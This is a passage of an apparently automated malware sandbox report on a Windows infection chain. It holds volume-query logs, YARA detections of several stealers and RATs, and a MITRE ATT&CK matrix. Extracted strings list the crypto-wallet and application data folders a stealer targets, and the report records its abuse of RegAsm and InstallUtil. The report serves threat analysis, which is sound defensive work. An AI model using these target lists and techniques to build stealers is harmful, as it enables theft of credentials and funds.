Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe

Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe VolumeInformation
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Queries volume information: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe VolumeInformation
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Queries volume information: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_005F0030 GetLocalTime,__swprintf,

19_2_005F0030

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_005F0722 GetUserNameW,

19_2_005F0722

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_005E416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

19_2_005E416A

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe

Code function: 0_2_0040681B GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_0040681B

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 31.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.3.build2.exe.2b60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.build2.exe.2af0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.build2.exe.2af0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.3.build2.exe.2b60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000003.3728665099.0000000002B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.4175235264.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.4162638293.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000221001\exbuild.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\exbuild[1].exe, type: DROPPED

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: 3546345.exe PID: 7096, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match

File source: 00000027.00000002.3650886377.00000220BC200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 51.2.RegAsm.exe.482060.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.482060.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000033.00000002.3597562499.0000000000479000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: 43.2.GOLD.exe.3405570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.GOLD.exe.3405570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.436060.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.436060.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 46.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000033.00000002.3597562499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.3591044518.0000000003405000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000002.4554653259.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: GOLD.exe PID: 8036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 4204, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4500, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\WIDeqOfZq9.exe, type: DROPPED

Yara detected XWorm

Source: Yara match	File source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.0.IIZS2TRqf69aZbLAX3cf3edn.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002A.00000002.4703878971.0000000012DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000000.3476472138.0000000000BF2000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.4674057559.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: IIZS2TRqf69aZbLAX3cf3edn.exe PID: 5052, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Windows.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 51.2.RegAsm.exe.482060.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.482060.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 3546345.exe, 00000025.00000000.3386144333.00000000005AD000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: FAmazon Musicworkspace-storagelocalization-cacheJavaScriptdictionarieswebviewMcAfeeScreenPalF:G:brave.exempressCodeSteamCachedDatalinknowTechSmithMcAfee_IncReleasesWindows Server 2008 %wS.nuget.dotnetMetroJaxxOneNoteElectrumEdrawWarThunderOpera Software\Opera DeveloperBorisFXAppCenterInnovative SolutionsDewMobilemoedaData (Time): ...atomic\Local Storage\leveldbmonedaDawnCacheCode CachedatabasesCrashpadVisualStudioVaultSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000DriverDescHARDWARE\DESCRIPTION\System\CentralProcessor\0ProcessorNameStringDisplayNameSOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\UninstallDisplayVersionSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallfhilaheimglignddkjgofkcbgekhenbhfnjhmkhhmkbjkkabndcnnogagogbneec
Source: 3546345.exe, 00000025.00000000.3386144333.00000000005AD000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: YXFeedsSquirrelTempPublishersinkscapeLedger Live\114\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)MultiBitHDTestertof_launcher\tbs_cache\NZXT CAM\CLR_v2.0_32EOS-Webcam-Utilitybit_flags & MZ_ZIP_LDH_BIT_FLAG_HAS_LOCATORcatsxp.exebitboxF12NitroPioneerXuanZhi9MaxonXuanZhiGPU: Riot Games\VisualStudio Servicesapp.json.updaterId.node-redOnDeviceHeadSuggestModelbefore_first_zip
Source: 3546345.exe, 00000025.00000000.3386144333.00000000005AD000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: YXFeedsSquirrelTempPublishersinkscapeLedger Live\114\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)MultiBitHDTestertof_launcher\tbs_cache\NZXT CAM\CLR_v2.0_32EOS-Webcam-Utilitybit_flags & MZ_ZIP_LDH_BIT_FLAG_HAS_LOCATORcatsxp.exebitboxF12NitroPioneerXuanZhi9MaxonXuanZhiGPU: Riot Games\VisualStudio Servicesapp.json.updaterId.node-redOnDeviceHeadSuggestModelbefore_first_zip
Source: 3546345.exe, 00000025.00000000.3386144333.00000000005AD000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: Numpadcom.liberty.jaxxMovavijrelauncher-updaterMy projectGoogleUpdaterpreferencesPackageCache
Source: 3546345.exe, 00000025.00000000.3386144333.00000000005AD000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: YXFeedsSquirrelTempPublishersinkscapeLedger Live\114\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)MultiBitHDTestertof_launcher\tbs_cache\NZXT CAM\CLR_v2.0_32EOS-Webcam-Utilitybit_flags & MZ_ZIP_LDH_BIT_FLAG_HAS_LOCATORcatsxp.exebitboxF12NitroPioneerXuanZhi9MaxonXuanZhiGPU: Riot Games\VisualStudio Servicesapp.json.updaterId.node-redOnDeviceHeadSuggestModelbefore_first_zip
Source: 3546345.exe, 00000025.00000000.3386144333.00000000005AD000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: Picasa2ZomboidBeamNG.drivediscordFACEITOS: 2SnapshotsFailed to get temp path\exodus.walletH:VirtualBox VMsBlenderGIMPBlender FoundationMendeley Reference ManageropcgpfmipidbgpenhmajoajpbobppdilDATAparkFoxit SoftwareJDownloaderMoises360TotalSecurityMEmu360safe
Source: 3546345.exe, 00000025.00000000.3386144333.00000000005AD000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: AWebView2Panasonictrxnot initializedinvalid entry nameentry not foundinvalid zip modeinvalid compression levelno zip 64 supportmemset errorcannot write data to entrycannot initialize tdefl compressorinvalid indexheader not foundcannot flush tdefl buffercannot write entry headercannot create entry headercannot write to central dircannot open fileinvalid entry typeextracting data using no memory allocationfile not foundno permissionout of memoryinvalid zip archive namemake dir errorsymlink errorclose archive errorcapacity size too smallfseek errorfread errorfwrite errorcannot initialize readercannot initialize writercannot initialize writer from readerstream endneed dictionaryfile errorstream errordata errorout of memorybuf errorversion errorparameter errorTempstoragesolConfigEthereum (UTC).next%d x %d/home/anal/bot/zip_include/zip.c(zip->entry.header_offset & (pzip->m_file_offset_alignment - 1)) == 0webcache2webcachetonphraseseedpipWind
Source: RegAsm.exe, 00000033.00000002.3597562499.0000000000479000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore

Source: GuardTrack.scr	Binary or memory string: WIN_81
Source: GuardTrack.scr	Binary or memory string: WIN_XP
Source: GuardTrack.scr	Binary or memory string: WIN_XPe
Source: GuardTrack.scr	Binary or memory string: WIN_VISTA
Source: GuardTrack.scr	Binary or memory string: WIN_7
Source: GuardTrack.scr	Binary or memory string: WIN_8
Source: Scottish.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: 3546345.exe PID: 7096, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match

File source: 00000027.00000002.3650886377.00000220BC200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 51.2.RegAsm.exe.482060.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.482060.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000033.00000002.3597562499.0000000000479000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: 43.2.GOLD.exe.3405570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.GOLD.exe.3405570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.436060.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.436060.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 46.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000033.00000002.3597562499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.3591044518.0000000003405000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000002.4554653259.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: GOLD.exe PID: 8036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 4204, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4500, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\WIDeqOfZq9.exe, type: DROPPED

Yara detected XWorm

Source: Yara match	File source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.0.IIZS2TRqf69aZbLAX3cf3edn.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002A.00000002.4703878971.0000000012DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000000.3476472138.0000000000BF2000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.4674057559.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: IIZS2TRqf69aZbLAX3cf3edn.exe PID: 5052, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Windows.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 51.2.RegAsm.exe.482060.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.482060.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe, type: DROPPED

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0062696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	19_2_0062696E
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_00626E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	19_2_00626E32
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_0043269B Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,	31_2_0043269B
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_004319A4 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	31_2_004319A4
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B22902 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,	31_2_02B22902
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B21C0B Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	31_2_02B21C0B

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	131 Windows Management Instrumentation	111 Scripting	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	31 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Shared Modules	2 Valid Accounts	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	31 Input Capture	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
